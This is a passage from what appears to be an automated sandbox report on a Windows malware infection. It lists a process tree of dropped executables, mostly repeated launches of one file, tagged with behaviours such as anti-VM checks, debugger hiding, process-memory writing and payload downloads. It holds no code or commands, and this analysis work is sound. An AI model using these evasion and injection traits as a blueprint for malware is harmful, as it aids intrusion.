        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10900
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10908
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10920
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10940
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10960
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10968
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10976
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10984
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10992
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11000
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11008
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11016
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11024
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11032
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11040
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11048
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11056
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11064
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11076
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11084
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11092
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11100
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11108
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11116
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11124
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11136
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11148
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11160
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11172
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11184
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11192
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11204
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11212
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11220
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11228
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11236
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11244
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11252
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11260
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10652
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10664
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10516
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10928
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:10936
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11268
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11280
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11296
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11304
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11312
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11320
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11328
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11344
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11352
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11360
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11368
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11376
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11384
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11392
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11400
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11408
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11416
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11424
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11432
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11440
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11448
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11456
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11464
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11476
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11484
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11492
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11500
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11508
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11516
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11524
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11532
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11540
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11548
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11556
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11564
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11572
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11580
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11588
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11596
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11608
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11616
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11628
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11636
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11644
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11652
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11660
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11676
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11688
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11700
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11708
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11716
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11732
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11744
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11752
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11760
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11772
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11780
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11824
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11836
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11856
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11872
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11880
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11888
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11896
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11908
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11916
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11924
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11940
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        
        PID:11952
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
      "C:\Users\Admin\AppData\Local\Temp\B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4216
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5552

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4536

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2488
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1592

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2836

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1148

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2940

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2848

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1784

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3996

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5888

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:736

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:6080

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3700

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1844

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:4964

C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
1⤵
- Executes dropped EXE
PID:3632

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
1⤵
- Executes dropped EXE
PID:4020

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3824

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
